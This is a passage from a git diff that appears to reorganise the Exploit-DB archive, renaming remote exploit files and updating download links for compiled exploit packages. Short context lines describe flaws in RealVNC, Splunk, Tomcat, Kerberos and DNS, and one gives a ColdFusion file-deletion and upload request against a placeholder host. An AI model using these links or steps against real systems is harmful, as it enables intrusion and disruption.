rename from platforms/multiple/remote/16297.rb rename to exploits/multiple/remote/16297.rb diff --git a/platforms/multiple/remote/16298.rb b/exploits/multiple/remote/16298.rb similarity index 100% rename from platforms/multiple/remote/16298.rb rename to exploits/multiple/remote/16298.rb diff --git a/platforms/multiple/remote/16299.rb b/exploits/multiple/remote/16299.rb similarity index 100% rename from platforms/multiple/remote/16299.rb rename to exploits/multiple/remote/16299.rb diff --git a/platforms/multiple/remote/16300.rb b/exploits/multiple/remote/16300.rb similarity index 100% rename from platforms/multiple/remote/16300.rb rename to exploits/multiple/remote/16300.rb diff --git a/platforms/multiple/remote/16301.rb b/exploits/multiple/remote/16301.rb similarity index 100% rename from platforms/multiple/remote/16301.rb rename to exploits/multiple/remote/16301.rb diff --git a/platforms/multiple/remote/16302.rb b/exploits/multiple/remote/16302.rb similarity index 100% rename from platforms/multiple/remote/16302.rb rename to exploits/multiple/remote/16302.rb diff --git a/platforms/multiple/remote/16303.rb b/exploits/multiple/remote/16303.rb similarity index 100% rename from platforms/multiple/remote/16303.rb rename to exploits/multiple/remote/16303.rb diff --git a/platforms/multiple/remote/16304.rb b/exploits/multiple/remote/16304.rb similarity index 100% rename from platforms/multiple/remote/16304.rb rename to exploits/multiple/remote/16304.rb diff --git a/platforms/multiple/remote/16305.rb b/exploits/multiple/remote/16305.rb similarity index 100% rename from platforms/multiple/remote/16305.rb rename to exploits/multiple/remote/16305.rb diff --git a/platforms/multiple/remote/16308.rb b/exploits/multiple/remote/16308.rb similarity index 100% rename from platforms/multiple/remote/16308.rb rename to exploits/multiple/remote/16308.rb diff --git a/platforms/multiple/remote/16309.rb b/exploits/multiple/remote/16309.rb similarity index 100% rename from platforms/multiple/remote/16309.rb rename to exploits/multiple/remote/16309.rb diff --git a/platforms/multiple/remote/16310.rb b/exploits/multiple/remote/16310.rb similarity index 100% rename from platforms/multiple/remote/16310.rb rename to exploits/multiple/remote/16310.rb diff --git a/platforms/multiple/remote/16312.rb b/exploits/multiple/remote/16312.rb similarity index 100% rename from platforms/multiple/remote/16312.rb rename to exploits/multiple/remote/16312.rb diff --git a/platforms/multiple/remote/16314.rb b/exploits/multiple/remote/16314.rb similarity index 100% rename from platforms/multiple/remote/16314.rb rename to exploits/multiple/remote/16314.rb diff --git a/platforms/multiple/remote/16315.rb b/exploits/multiple/remote/16315.rb similarity index 100% rename from platforms/multiple/remote/16315.rb rename to exploits/multiple/remote/16315.rb diff --git a/platforms/multiple/remote/16316.rb b/exploits/multiple/remote/16316.rb similarity index 100% rename from platforms/multiple/remote/16316.rb rename to exploits/multiple/remote/16316.rb diff --git a/platforms/multiple/remote/16317.rb b/exploits/multiple/remote/16317.rb similarity index 100% rename from platforms/multiple/remote/16317.rb rename to exploits/multiple/remote/16317.rb diff --git a/platforms/multiple/remote/16318.rb b/exploits/multiple/remote/16318.rb similarity index 100% rename from platforms/multiple/remote/16318.rb rename to exploits/multiple/remote/16318.rb diff --git a/platforms/multiple/remote/16319.rb b/exploits/multiple/remote/16319.rb similarity index 100% rename from platforms/multiple/remote/16319.rb rename to exploits/multiple/remote/16319.rb diff --git a/platforms/multiple/remote/16324.rb b/exploits/multiple/remote/16324.rb similarity index 100% rename from platforms/multiple/remote/16324.rb rename to exploits/multiple/remote/16324.rb diff --git a/platforms/multiple/remote/16495.rb b/exploits/multiple/remote/16495.rb similarity index 100% rename from platforms/multiple/remote/16495.rb rename to exploits/multiple/remote/16495.rb diff --git a/platforms/multiple/remote/16784.rb b/exploits/multiple/remote/16784.rb similarity index 100% rename from platforms/multiple/remote/16784.rb rename to exploits/multiple/remote/16784.rb diff --git a/platforms/multiple/remote/16789.rb b/exploits/multiple/remote/16789.rb similarity index 100% rename from platforms/multiple/remote/16789.rb rename to exploits/multiple/remote/16789.rb diff --git a/platforms/multiple/remote/16870.rb b/exploits/multiple/remote/16870.rb similarity index 100% rename from platforms/multiple/remote/16870.rb rename to exploits/multiple/remote/16870.rb diff --git a/platforms/multiple/remote/16985.rb b/exploits/multiple/remote/16985.rb similarity index 100% rename from platforms/multiple/remote/16985.rb rename to exploits/multiple/remote/16985.rb diff --git a/platforms/multiple/remote/16990.rb b/exploits/multiple/remote/16990.rb similarity index 100% rename from platforms/multiple/remote/16990.rb rename to exploits/multiple/remote/16990.rb diff --git a/platforms/multiple/remote/17068.py b/exploits/multiple/remote/17068.py similarity index 100% rename from platforms/multiple/remote/17068.py rename to exploits/multiple/remote/17068.py diff --git a/platforms/multiple/remote/17078.java b/exploits/multiple/remote/17078.java similarity index 100% rename from platforms/multiple/remote/17078.java rename to exploits/multiple/remote/17078.java diff --git a/platforms/multiple/remote/17148.rb b/exploits/multiple/remote/17148.rb similarity index 100% rename from platforms/multiple/remote/17148.rb rename to exploits/multiple/remote/17148.rb diff --git a/platforms/multiple/remote/17535.rb b/exploits/multiple/remote/17535.rb similarity index 100% rename from platforms/multiple/remote/17535.rb rename to exploits/multiple/remote/17535.rb diff --git a/platforms/multiple/remote/17691.rb b/exploits/multiple/remote/17691.rb similarity index 100% rename from platforms/multiple/remote/17691.rb rename to exploits/multiple/remote/17691.rb diff --git a/platforms/multiple/remote/1791.patch b/exploits/multiple/remote/1791.patch similarity index 87% rename from platforms/multiple/remote/1791.patch rename to exploits/multiple/remote/1791.patch index a47b15352..4e6ba6161 100644 --- a/platforms/multiple/remote/1791.patch +++ b/exploits/multiple/remote/1791.patch @@ -16,4 +16,4 @@ xx vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType); } E-DB Note: -Compiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar) \ No newline at end of file +Compiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar) \ No newline at end of file diff --git a/platforms/multiple/remote/1794.pm b/exploits/multiple/remote/1794.pm similarity index 100% rename from platforms/multiple/remote/1794.pm rename to exploits/multiple/remote/1794.pm diff --git a/platforms/multiple/remote/17969.py b/exploits/multiple/remote/17969.py similarity index 100% rename from platforms/multiple/remote/17969.py rename to exploits/multiple/remote/17969.py diff --git a/platforms/multiple/remote/1799.txt b/exploits/multiple/remote/1799.txt similarity index 73% rename from platforms/multiple/remote/1799.txt rename to exploits/multiple/remote/1799.txt index 679eb6167..2e7387ade 100644 --- a/platforms/multiple/remote/1799.txt +++ b/exploits/multiple/remote/1799.txt @@ -1,8 +1,8 @@ class101 - http://heapoverflow.com RealVNC 4.1.0 - 4.1.1 (VNC Null Authentication) Vulnerability Scanners --------------------------------------------------------------------- -windows: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-1.rar (05172006-VNC_bypauth-win32.rar) -linux: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-2.rar (05172006-VNC_bypauth-linux.tar.gz) +windows: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/1799-1.rar (05172006-VNC_bypauth-win32.rar) +linux: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/1799-2.rar (05172006-VNC_bypauth-linux.tar.gz) comments: http://heapoverflow.com/viewtopic.php?p=1729 --------------------------------------------------------------------- diff --git a/platforms/multiple/remote/18171.rb b/exploits/multiple/remote/18171.rb similarity index 100% rename from platforms/multiple/remote/18171.rb rename to exploits/multiple/remote/18171.rb diff --git a/platforms/multiple/remote/18245.py b/exploits/multiple/remote/18245.py similarity index 97% rename from platforms/multiple/remote/18245.py rename to exploits/multiple/remote/18245.py index 1f903b3e3..98feba0f4 100755 --- a/platforms/multiple/remote/18245.py +++ b/exploits/multiple/remote/18245.py @@ -19,7 +19,7 @@ Author: Gary O'leary-Steele @ Sec-1 Ltd Date: 5th September 2011 Release date: Private -Full Package: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18245.zip +Full Package: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18245.zip C:\git\splunk>python splunk_exploit.py -h Usage: Run splunk_exploit.py -h to see usage options diff --git a/platforms/multiple/remote/18442.html b/exploits/multiple/remote/18442.html similarity index 100% rename from platforms/multiple/remote/18442.html rename to exploits/multiple/remote/18442.html diff --git a/platforms/multiple/remote/18619.txt b/exploits/multiple/remote/18619.txt similarity index 90% rename from platforms/multiple/remote/18619.txt rename to exploits/multiple/remote/18619.txt index 52ced8f7b..ebc500a48 100644 --- a/platforms/multiple/remote/18619.txt +++ b/exploits/multiple/remote/18619.txt @@ -25,4 +25,4 @@ Enjoy :> /Kingcope -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18619.zip (tomcat-remote.zip) \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18619.zip (tomcat-remote.zip) \ No newline at end of file diff --git a/platforms/multiple/remote/18679.rb b/exploits/multiple/remote/18679.rb similarity index 100% rename from platforms/multiple/remote/18679.rb rename to exploits/multiple/remote/18679.rb diff --git a/platforms/multiple/remote/18723.rb b/exploits/multiple/remote/18723.rb similarity index 100% rename from platforms/multiple/remote/18723.rb rename to exploits/multiple/remote/18723.rb diff --git a/platforms/multiple/remote/18763.txt b/exploits/multiple/remote/18763.txt similarity index 93% rename from platforms/multiple/remote/18763.txt rename to exploits/multiple/remote/18763.txt index 98dbecdd8..033ca7806 100644 --- a/platforms/multiple/remote/18763.txt +++ b/exploits/multiple/remote/18763.txt @@ -15,7 +15,7 @@ Proof of concept: Code demonstrating the vulnerability can be found at https://github.com/jelmerk/LPS-24562-proof -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18763.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18763.tar.gz Systems affected: diff --git a/platforms/multiple/remote/18896.rb b/exploits/multiple/remote/18896.rb similarity index 100% rename from platforms/multiple/remote/18896.rb rename to exploits/multiple/remote/18896.rb diff --git a/platforms/multiple/remote/18984.rb b/exploits/multiple/remote/18984.rb similarity index 100% rename from platforms/multiple/remote/18984.rb rename to exploits/multiple/remote/18984.rb diff --git a/platforms/multiple/remote/19081.txt b/exploits/multiple/remote/19081.txt similarity index 100% rename from platforms/multiple/remote/19081.txt rename to exploits/multiple/remote/19081.txt diff --git a/platforms/multiple/remote/19084.txt b/exploits/multiple/remote/19084.txt similarity index 100% rename from platforms/multiple/remote/19084.txt rename to exploits/multiple/remote/19084.txt diff --git a/platforms/multiple/remote/19092.py b/exploits/multiple/remote/19092.py similarity index 100% rename from platforms/multiple/remote/19092.py rename to exploits/multiple/remote/19092.py diff --git a/platforms/multiple/remote/19093.txt b/exploits/multiple/remote/19093.txt similarity index 94% rename from platforms/multiple/remote/19093.txt rename to exploits/multiple/remote/19093.txt index 710762f95..213c4392e 100644 --- a/platforms/multiple/remote/19093.txt +++ b/exploits/multiple/remote/19093.txt @@ -10,4 +10,4 @@ http://www.victim.test/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=2000&OpenFileP Now replace the "dummy.txt" string by "ExprCalc.cfm" to delete that file. We can now upload and execute ColdFusion files in the server without them being deleted. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19093.cfm \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19093.cfm \ No newline at end of file diff --git a/platforms/multiple/remote/19118.txt b/exploits/multiple/remote/19118.txt similarity index 100% rename from platforms/multiple/remote/19118.txt rename to exploits/multiple/remote/19118.txt diff --git a/platforms/multiple/remote/19120.txt b/exploits/multiple/remote/19120.txt similarity index 100% rename from platforms/multiple/remote/19120.txt rename to exploits/multiple/remote/19120.txt diff --git a/platforms/multiple/remote/19121.txt b/exploits/multiple/remote/19121.txt similarity index 100% rename from platforms/multiple/remote/19121.txt rename to exploits/multiple/remote/19121.txt diff --git a/platforms/multiple/remote/19127.txt b/exploits/multiple/remote/19127.txt similarity index 100% rename from platforms/multiple/remote/19127.txt rename to exploits/multiple/remote/19127.txt diff --git a/platforms/multiple/remote/19129.txt b/exploits/multiple/remote/19129.txt similarity index 100% rename from platforms/multiple/remote/19129.txt rename to exploits/multiple/remote/19129.txt diff --git a/platforms/multiple/remote/19193.txt b/exploits/multiple/remote/19193.txt similarity index 100% rename from platforms/multiple/remote/19193.txt rename to exploits/multiple/remote/19193.txt diff --git a/platforms/multiple/remote/19194.txt b/exploits/multiple/remote/19194.txt similarity index 100% rename from platforms/multiple/remote/19194.txt rename to exploits/multiple/remote/19194.txt diff --git a/platforms/multiple/remote/19221.txt b/exploits/multiple/remote/19221.txt similarity index 100% rename from platforms/multiple/remote/19221.txt rename to exploits/multiple/remote/19221.txt diff --git a/platforms/multiple/remote/19222.txt b/exploits/multiple/remote/19222.txt similarity index 100% rename from platforms/multiple/remote/19222.txt rename to exploits/multiple/remote/19222.txt diff --git a/platforms/multiple/remote/19223.txt b/exploits/multiple/remote/19223.txt similarity index 100% rename from platforms/multiple/remote/19223.txt rename to exploits/multiple/remote/19223.txt diff --git a/platforms/multiple/remote/19242.txt b/exploits/multiple/remote/19242.txt similarity index 100% rename from platforms/multiple/remote/19242.txt rename to exploits/multiple/remote/19242.txt diff --git a/platforms/multiple/remote/19298.txt b/exploits/multiple/remote/19298.txt similarity index 100% rename from platforms/multiple/remote/19298.txt rename to exploits/multiple/remote/19298.txt diff --git a/platforms/multiple/remote/19299.txt b/exploits/multiple/remote/19299.txt similarity index 100% rename from platforms/multiple/remote/19299.txt rename to exploits/multiple/remote/19299.txt diff --git a/platforms/multiple/remote/19303.txt b/exploits/multiple/remote/19303.txt similarity index 100% rename from platforms/multiple/remote/19303.txt rename to exploits/multiple/remote/19303.txt diff --git a/platforms/multiple/remote/19363.txt b/exploits/multiple/remote/19363.txt similarity index 100% rename from platforms/multiple/remote/19363.txt rename to exploits/multiple/remote/19363.txt diff --git a/platforms/multiple/remote/19383.txt b/exploits/multiple/remote/19383.txt similarity index 100% rename from platforms/multiple/remote/19383.txt rename to exploits/multiple/remote/19383.txt diff --git a/platforms/multiple/remote/19420.c b/exploits/multiple/remote/19420.c similarity index 100% rename from platforms/multiple/remote/19420.c rename to exploits/multiple/remote/19420.c diff --git a/platforms/multiple/remote/19421.c b/exploits/multiple/remote/19421.c similarity index 100% rename from platforms/multiple/remote/19421.c rename to exploits/multiple/remote/19421.c diff --git a/platforms/multiple/remote/19426.c b/exploits/multiple/remote/19426.c similarity index 100% rename from platforms/multiple/remote/19426.c rename to exploits/multiple/remote/19426.c diff --git a/platforms/multiple/remote/19443.txt b/exploits/multiple/remote/19443.txt similarity index 100% rename from platforms/multiple/remote/19443.txt rename to exploits/multiple/remote/19443.txt diff --git a/platforms/multiple/remote/19451.txt b/exploits/multiple/remote/19451.txt similarity index 96% rename from platforms/multiple/remote/19451.txt rename to exploits/multiple/remote/19451.txt index a4a70cd47..e04b8f3bf 100644 --- a/platforms/multiple/remote/19451.txt +++ b/exploits/multiple/remote/19451.txt @@ -41,4 +41,4 @@ Preference: If the preference is not specified, it will use a default of 1000, w 2nd Router Addr: By using the '-r' flag and specifying a second router address entry, the packet can contain a bogus source address and still be processed for correct gateway entries by the end host. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19451.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19451.tar.gz \ No newline at end of file diff --git a/platforms/multiple/remote/19459.txt b/exploits/multiple/remote/19459.txt similarity index 93% rename from platforms/multiple/remote/19459.txt rename to exploits/multiple/remote/19459.txt index 4a6289b07..006ddd3a8 100644 --- a/platforms/multiple/remote/19459.txt +++ b/exploits/multiple/remote/19459.txt @@ -4,4 +4,4 @@ Ircd hybrid-6 (up to beta 58) has a vulnerability which can allow remote access This vulnerability is in the invite handling code (m_invite). In a channel with operators (ops) and modes +pi (paranoid + invite-only), a channel invitation is reported to all other operators. The buffer used to store the invitation notice can be overflown by up to 15 bytes. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19459.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19459.tgz \ No newline at end of file diff --git a/platforms/multiple/remote/19466.txt b/exploits/multiple/remote/19466.txt similarity index 100% rename from platforms/multiple/remote/19466.txt rename to exploits/multiple/remote/19466.txt diff --git a/platforms/multiple/remote/19492.txt b/exploits/multiple/remote/19492.txt similarity index 100% rename from platforms/multiple/remote/19492.txt rename to exploits/multiple/remote/19492.txt diff --git a/platforms/multiple/remote/19493.txt b/exploits/multiple/remote/19493.txt similarity index 100% rename from platforms/multiple/remote/19493.txt rename to exploits/multiple/remote/19493.txt diff --git a/platforms/multiple/remote/19560.c b/exploits/multiple/remote/19560.c similarity index 100% rename from platforms/multiple/remote/19560.c rename to exploits/multiple/remote/19560.c diff --git a/platforms/multiple/remote/19644.txt b/exploits/multiple/remote/19644.txt similarity index 100% rename from platforms/multiple/remote/19644.txt rename to exploits/multiple/remote/19644.txt diff --git a/platforms/multiple/remote/19667.c b/exploits/multiple/remote/19667.c similarity index 100% rename from platforms/multiple/remote/19667.c rename to exploits/multiple/remote/19667.c diff --git a/platforms/multiple/remote/19686.txt b/exploits/multiple/remote/19686.txt similarity index 100% rename from platforms/multiple/remote/19686.txt rename to exploits/multiple/remote/19686.txt diff --git a/platforms/multiple/remote/19691.pl b/exploits/multiple/remote/19691.pl similarity index 100% rename from platforms/multiple/remote/19691.pl rename to exploits/multiple/remote/19691.pl diff --git a/platforms/multiple/remote/19712.txt b/exploits/multiple/remote/19712.txt similarity index 100% rename from platforms/multiple/remote/19712.txt rename to exploits/multiple/remote/19712.txt diff --git a/platforms/multiple/remote/19732.html b/exploits/multiple/remote/19732.html similarity index 100% rename from platforms/multiple/remote/19732.html rename to exploits/multiple/remote/19732.html diff --git a/platforms/multiple/remote/19742.txt b/exploits/multiple/remote/19742.txt similarity index 100% rename from platforms/multiple/remote/19742.txt rename to exploits/multiple/remote/19742.txt diff --git a/platforms/multiple/remote/19749.txt b/exploits/multiple/remote/19749.txt similarity index 96% rename from platforms/multiple/remote/19749.txt rename to exploits/multiple/remote/19749.txt index 8ecf8248b..a26efb5ed 100644 --- a/platforms/multiple/remote/19749.txt +++ b/exploits/multiple/remote/19749.txt @@ -6,4 +6,4 @@ A potential denial of service (hence forth referred to as DoS) attack exists in The vulnerability exists in the way name servers will behave in the event that they are unable to receive replies for a domain from a nameserver they consider authoritative. When a nameserver receives a query, it is typically forwarded up a chain of DNS server. If the query cannot be resolved because there is no nameserver listening on the remote host, every forwarding nameserver will attempt to resolve the nameserver themselves. These are typically retried three times, at 0, 12 and 24 seconds. In this case, the traffic is significantly multiplied. By abusing multiple nameservers, it becomes possible to send a large quantity of data to a given network, with packet sizes as large as 500 bytes. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19749.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19749.tar.gz \ No newline at end of file diff --git a/platforms/multiple/remote/19751.txt b/exploits/multiple/remote/19751.txt similarity index 100% rename from platforms/multiple/remote/19751.txt rename to exploits/multiple/remote/19751.txt diff --git a/platforms/multiple/remote/19781.sh b/exploits/multiple/remote/19781.sh similarity index 100% rename from platforms/multiple/remote/19781.sh rename to exploits/multiple/remote/19781.sh diff --git a/platforms/multiple/remote/19784.txt b/exploits/multiple/remote/19784.txt similarity index 100% rename from platforms/multiple/remote/19784.txt rename to exploits/multiple/remote/19784.txt diff --git a/platforms/multiple/remote/19800.c b/exploits/multiple/remote/19800.c similarity index 100% rename from platforms/multiple/remote/19800.c rename to exploits/multiple/remote/19800.c diff --git a/platforms/multiple/remote/19814.c b/exploits/multiple/remote/19814.c similarity index 100% rename from platforms/multiple/remote/19814.c rename to exploits/multiple/remote/19814.c diff --git a/platforms/multiple/remote/19824.txt b/exploits/multiple/remote/19824.txt similarity index 100% rename from platforms/multiple/remote/19824.txt rename to exploits/multiple/remote/19824.txt diff --git a/platforms/multiple/remote/19828.txt b/exploits/multiple/remote/19828.txt similarity index 100% rename from platforms/multiple/remote/19828.txt rename to exploits/multiple/remote/19828.txt diff --git a/platforms/multiple/remote/19886.c b/exploits/multiple/remote/19886.c similarity index 100% rename from platforms/multiple/remote/19886.c rename to exploits/multiple/remote/19886.c diff --git a/platforms/multiple/remote/19887.c b/exploits/multiple/remote/19887.c similarity index 100% rename from platforms/multiple/remote/19887.c rename to exploits/multiple/remote/19887.c diff --git a/platforms/multiple/remote/19888.c b/exploits/multiple/remote/19888.c similarity index 100% rename from platforms/multiple/remote/19888.c rename to exploits/multiple/remote/19888.c diff --git a/platforms/multiple/remote/19903.txt b/exploits/multiple/remote/19903.txt similarity index 100% rename from platforms/multiple/remote/19903.txt rename to exploits/multiple/remote/19903.txt diff --git a/platforms/multiple/remote/19906.txt b/exploits/multiple/remote/19906.txt similarity index 100% rename from platforms/multiple/remote/19906.txt rename to exploits/multiple/remote/19906.txt diff --git a/platforms/multiple/remote/19916.c b/exploits/multiple/remote/19916.c similarity index 100% rename from platforms/multiple/remote/19916.c rename to exploits/multiple/remote/19916.c diff --git a/platforms/multiple/remote/19917.c b/exploits/multiple/remote/19917.c similarity index 100% rename from platforms/multiple/remote/19917.c rename to exploits/multiple/remote/19917.c diff --git a/platforms/multiple/remote/19918.c b/exploits/multiple/remote/19918.c similarity index 100% rename from platforms/multiple/remote/19918.c rename to exploits/multiple/remote/19918.c diff --git a/platforms/multiple/remote/19944.pl b/exploits/multiple/remote/19944.pl similarity index 100% rename from platforms/multiple/remote/19944.pl rename to exploits/multiple/remote/19944.pl diff --git a/platforms/multiple/remote/19945.txt b/exploits/multiple/remote/19945.txt similarity index 100% rename from platforms/multiple/remote/19945.txt rename to exploits/multiple/remote/19945.txt diff --git a/platforms/multiple/remote/1997.php b/exploits/multiple/remote/1997.php similarity index 100% rename from platforms/multiple/remote/1997.php rename to exploits/multiple/remote/1997.php diff --git a/platforms/multiple/remote/20027.txt b/exploits/multiple/remote/20027.txt similarity index 100% rename from platforms/multiple/remote/20027.txt rename to exploits/multiple/remote/20027.txt diff --git a/platforms/multiple/remote/20091.txt b/exploits/multiple/remote/20091.txt similarity index 100% rename from platforms/multiple/remote/20091.txt rename to exploits/multiple/remote/20091.txt diff --git a/platforms/multiple/remote/20095.txt b/exploits/multiple/remote/20095.txt similarity index 100% rename from platforms/multiple/remote/20095.txt rename to exploits/multiple/remote/20095.txt diff --git a/platforms/multiple/remote/20097.txt b/exploits/multiple/remote/20097.txt similarity index 100% rename from platforms/multiple/remote/20097.txt rename to exploits/multiple/remote/20097.txt diff --git a/platforms/multiple/remote/201.c b/exploits/multiple/remote/201.c similarity index 100% rename from platforms/multiple/remote/201.c rename to exploits/multiple/remote/201.c diff --git a/platforms/multiple/remote/20104.txt b/exploits/multiple/remote/20104.txt similarity index 100% rename from platforms/multiple/remote/20104.txt rename to exploits/multiple/remote/20104.txt diff --git a/platforms/multiple/remote/20131.txt b/exploits/multiple/remote/20131.txt similarity index 100% rename from platforms/multiple/remote/20131.txt rename to exploits/multiple/remote/20131.txt diff --git a/platforms/multiple/remote/20132.txt b/exploits/multiple/remote/20132.txt similarity index 100% rename from platforms/multiple/remote/20132.txt rename to exploits/multiple/remote/20132.txt diff --git a/platforms/multiple/remote/20139.txt b/exploits/multiple/remote/20139.txt similarity index 98% rename from platforms/multiple/remote/20139.txt rename to exploits/multiple/remote/20139.txt index 326e3d11e..547c1ee91 100644 --- a/platforms/multiple/remote/20139.txt +++ b/exploits/multiple/remote/20139.txt @@ -16,4 +16,4 @@ By combining these two flaws a malicious applet can accept connections from any Both Netscape and Microsoft Java Virtual Machines are affected by this vulnerability, however in Microsoft products the file: URL type will not be effective in reading files, meaning that only web-available documents can be retreived via this method. However, the file: method will verify the existence of a file. It will check to see if the file exists and if it does not, it will return a SecurityException error message. Netscape browsers will pass both web documents and local files to the attacker. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20139.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20139.tar.gz \ No newline at end of file diff --git a/platforms/multiple/remote/20140.txt b/exploits/multiple/remote/20140.txt similarity index 96% rename from platforms/multiple/remote/20140.txt rename to exploits/multiple/remote/20140.txt index f28ef24e0..b6b4f9156 100644 --- a/platforms/multiple/remote/20140.txt +++ b/exploits/multiple/remote/20140.txt @@ -8,4 +8,4 @@ Netscape's netscape.net.URLConnection and netscape.net.URLInputStream classes se If the machine running the malicious applet is behind a firewall it will also be able to download resources that can be accessed via a URL, such as web server ("http://" or "https://) or FTP servers ("ftp://"), that the attacker in control of the machine from which the applet was downloaded could not. In this way a malicious applet could be used to penetrate a firewall. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20140.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20140.tar.gz \ No newline at end of file diff --git a/platforms/multiple/remote/2017.pl b/exploits/multiple/remote/2017.pl similarity index 100% rename from platforms/multiple/remote/2017.pl rename to exploits/multiple/remote/2017.pl diff --git a/platforms/multiple/remote/20181.txt b/exploits/multiple/remote/20181.txt similarity index 97% rename from platforms/multiple/remote/20181.txt rename to exploits/multiple/remote/20181.txt index 60570c8d3..f90f49c1e 100644 --- a/platforms/multiple/remote/20181.txt +++ b/exploits/multiple/remote/20181.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1616/info Kerberos is a cryptographic authentication protocol that allows users of a network to access services without transmitting cleartext passwords. A common implementation of the protocol includes a login service which is vulnerable to an attack which involves spoofing responses from the Key Distribution Center (KDC). The login service authenticates a user by first requesting a ticket granting ticket (TGT) from the authentication server. If the TGT can be decrypted using the password supplied by the user, the login service attempts to verify the identity of the KDC by making a request with the received TGT for a service ticket for itself. The service ticket returned by the KDC is encrypted with a secret shared between the KDC and the service host. If the service ticket cannot be verified with the service's secret key it is assumed that the KDC is not authentic. If the login service has not been registered as a principal with the KDC or the service's secret key has not been installed on the host the login service will proceed without verification that the TGT was returned by the authentic KDC. In these circumstances it is possible to log into the server illicitly if an attacker can spoof responses from the Key Distribution Center. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20181.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20181.tar.gz \ No newline at end of file diff --git a/platforms/multiple/remote/20206.txt b/exploits/multiple/remote/20206.txt similarity index 100% rename from platforms/multiple/remote/20206.txt rename to exploits/multiple/remote/20206.txt diff --git a/platforms/multiple/remote/20207.txt b/exploits/multiple/remote/20207.txt similarity index 100% rename from platforms/multiple/remote/20207.txt rename to exploits/multiple/remote/20207.txt diff --git a/platforms/multiple/remote/20215.pl b/exploits/multiple/remote/20215.pl similarity index 100% rename from platforms/multiple/remote/20215.pl rename to exploits/multiple/remote/20215.pl diff --git a/platforms/multiple/remote/20216.sh b/exploits/multiple/remote/20216.sh similarity index 100% rename from platforms/multiple/remote/20216.sh rename to exploits/multiple/remote/20216.sh diff --git a/platforms/multiple/remote/20234.txt b/exploits/multiple/remote/20234.txt similarity index 100% rename from platforms/multiple/remote/20234.txt rename to exploits/multiple/remote/20234.txt diff --git a/platforms/multiple/remote/20258.c b/exploits/multiple/remote/20258.c similarity index 100% rename from platforms/multiple/remote/20258.c rename to exploits/multiple/remote/20258.c diff --git a/platforms/multiple/remote/20259.txt b/exploits/multiple/remote/20259.txt similarity index 94% rename from platforms/multiple/remote/20259.txt rename to exploits/multiple/remote/20259.txt index 3264180b4..6aa8cb057 100644 --- a/platforms/multiple/remote/20259.txt +++ b/exploits/multiple/remote/20259.txt @@ -8,4 +8,4 @@ After receiving a request to update the Yello Pages maps, 'ypupdated' executes a This is issue is tracked by Sun BugIDs 1230027 and 1232146. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20259.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20259.tar.gz \ No newline at end of file diff --git a/platforms/multiple/remote/20313.txt b/exploits/multiple/remote/20313.txt similarity index 100% rename from platforms/multiple/remote/20313.txt rename to exploits/multiple/remote/20313.txt diff --git a/platforms/multiple/remote/20314.txt b/exploits/multiple/remote/20314.txt similarity index 100% rename from platforms/multiple/remote/20314.txt rename to exploits/multiple/remote/20314.txt diff --git a/platforms/multiple/remote/20315.txt b/exploits/multiple/remote/20315.txt similarity index 100% rename from platforms/multiple/remote/20315.txt rename to exploits/multiple/remote/20315.txt diff --git a/platforms/multiple/remote/20322.html b/exploits/multiple/remote/20322.html similarity index 100% rename from platforms/multiple/remote/20322.html rename to exploits/multiple/remote/20322.html diff --git a/platforms/multiple/remote/20406.txt b/exploits/multiple/remote/20406.txt similarity index 100% rename from platforms/multiple/remote/20406.txt rename to exploits/multiple/remote/20406.txt diff --git a/platforms/multiple/remote/20425.pl b/exploits/multiple/remote/20425.pl similarity index 100% rename from platforms/multiple/remote/20425.pl rename to exploits/multiple/remote/20425.pl diff --git a/platforms/multiple/remote/20441.txt b/exploits/multiple/remote/20441.txt similarity index 100% rename from platforms/multiple/remote/20441.txt rename to exploits/multiple/remote/20441.txt diff --git a/platforms/multiple/remote/20450.txt b/exploits/multiple/remote/20450.txt similarity index 100% rename from platforms/multiple/remote/20450.txt rename to exploits/multiple/remote/20450.txt diff --git a/platforms/multiple/remote/20466.txt b/exploits/multiple/remote/20466.txt similarity index 100% rename from platforms/multiple/remote/20466.txt rename to exploits/multiple/remote/20466.txt diff --git a/platforms/multiple/remote/20467.txt b/exploits/multiple/remote/20467.txt similarity index 100% rename from 